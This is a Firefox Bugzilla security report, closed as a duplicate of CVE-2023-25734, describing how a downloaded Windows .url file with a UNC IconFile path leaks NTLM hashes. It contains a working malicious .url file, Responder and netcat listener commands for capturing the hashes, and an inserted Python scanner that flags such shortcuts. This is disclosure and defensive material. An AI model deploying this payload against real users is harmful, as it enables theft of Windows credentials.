Bug 1812338: .URL file can also send NTLM hashes
Status: RESOLVED DUPLICATE of bug 1809923
Opened 1 year ago, closed 1 year ago
Categories: Firefox :: Security, defect
People: Reporter: haxatron1, Unassigned
Details: Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?]
Attachments: 1 file (4.76 MB, video/webm)
On Windows, a .URL file can also send NTLM hashes via the IconFile parameter. Thus it is possible to reproduce https://bugzilla.mozilla.org/show_bug.cgi?id=1773894 using a .URL file.
Flags: sec-bounty?
STR
- Host example.url on a server:
    [{000214A0-0000-0000-C000-000000000046}]
    Prop3=19,2
    [InternetShortcut]
    IDList=
    URL=\\192.168.1.109\test\test.ico
    IconFile=\\192.168.1.109\test\test.ico
    HotKey=0
- Replace all instances of 192.168.1.109 with your responder IP address.
- Start responder using responder -I eth0 -wvd
- Create a link that downloads example.url, see that example.url is downloaded by Firefox without any warning, click Show in Folder and the hash is leaked.
Alternatively, if you don't want to download responder, you may also verify that .url files are sending the hash.
Instead of Step 2, you can start a netcat server using
    nc -nvlp 445
And when you download example.url and click Show in Folder, a connection to your netcat server is made. On Windows, an SMB connection will result in auto-forwarding of the NTLM hash.
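As a defensive counterpart to the report above, this added example (not part of the bug report and not Firefox code) scans .url files for URL or IconFile values that name a remote host, which is the pattern the reporter's sample uses. The function names, the regular expression and the sample strings are assumptions made for illustration.

```python
import re
from pathlib import Path

# Keys that the report's sample file points at a UNC path.
PATH_KEYS = {"url", "iconfile"}
# Remote targets: \\host\share, \\?\UNC\host\share, file://host/share.
# Local forms such as \\?\C:\ and file:///C:/ are not matched.
REMOTE = re.compile(
    r"^(?:[\\/]{2}(?:[?.][\\/]UNC[\\/])?[^\\/?.]|file:[\\/]{2}[^\\/])", re.I)


def decode(data: bytes) -> str:
    """Handle UTF-16 files with a BOM; otherwise the ASCII keys survive as-is."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def remote_refs(text: str):
    """Return (section, key, value) for every value naming a remote host."""
    hits, section = [], ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        value = value.strip().strip('"')
        if sep and key.strip().lower() in PATH_KEYS and REMOTE.match(value):
            hits.append((section, key.strip(), value))
    return hits


def scan(folder):
    """Map each .url file under folder to its remote references, if any."""
    found = {}
    for path in Path(folder).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".url":
            refs = remote_refs(decode(path.read_bytes()))
            if refs:
                found[path.name] = refs
    return found


# Constructed samples (192.0.2.10 is a documentation address).
SUSPECT = "[InternetShortcut]\nURL=https://example.com/\nIconFile=\\\\192.0.2.10\\share\\a.ico\n"
BENIGN = "[InternetShortcut]\nURL=https://example.com/\nIconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=3\n"

if __name__ == "__main__":
    print(remote_refs(SUSPECT), remote_refs(BENIGN))
```

Running `scan()` over a downloads folder before it is opened in Explorer, or over quarantined mail attachments, lists the shortcuts worth a closer look.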
Updated 1 year ago
Status: UNCONFIRMED → RESOLVED
Closed: 1 year ago
Duplicate of bug: CVE-2023-25734
Resolution: --- → DUPLICATE
Updated 1 year ago
Flags: sec-bounty? → sec-bounty-
Updated 8 months ago
Group: firefox-core-security
Updated 27 days ago
Keywords: reporter-external